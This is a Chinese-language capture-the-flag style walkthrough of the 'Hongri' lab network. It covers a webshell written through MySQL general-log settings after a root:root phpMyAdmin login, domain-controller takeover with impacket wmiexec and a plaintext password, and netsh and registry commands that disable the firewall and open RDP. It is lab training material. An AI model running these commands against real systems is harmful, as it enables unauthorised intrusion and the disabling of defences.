红日靶场1-CS内网渗透 #
架构 #
IP:
攻击者为1网段
web服务器:1和52网段 其余成员皆只有1网段
使用工具 #
密码可能不同因为进去这些服务器就让你改密码你可以修改后改回来
使用工具:
CS4.7
哥斯拉
impacket-0.11.0套件
开始渗透 #
第一台主机 #
这里shell有两种还有一种是网站的还有一种是下面这种数据库
dir扫描发现开了phpadmin登录看看
弱口令进去
root:root
https://www.cnblogs.com/hellobao/articles/17253635.html
phpadmin提取方法
我选择下面这种
MySQL 本身具备的特性
通过日志文件写 shell
SHOW VARIABLES LIKE 'general%';
set global general_log = "ON";
set global general_log_file='C:\\phpstudy\\www\\\\star.php'
因为他这是phpstudy所以写入日志到star.php
打开功能
命令执行无误
确实可以访问
写入到日志
哥斯拉连接
弹到我们的CS工具上
扫描端口网段
自动放入到密码和目标里面
找到CD主机
第二台主机 #
因为前面信息收集到都开放了445 我们尝试下永恒之蓝和wmi
不行啊两台都
使用套件里面的wmi成功拿下DC
python wmiexec.py Administrator:hongrisec@2025@192.168.52.138 -codec gbk
这里我试了反弹但是就是不行正向都不行
最后关闭防火墙可以连接
#关闭防火墙
netsh firewall set opmode disable #winsows server 2003 之前
netsh advfirewall set allprofiles state off #winsows server 2003 之后
#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
第三台主机 #
在密码凭证那里
后面我们横向连接密码喷射上到第3台
三台全部拿下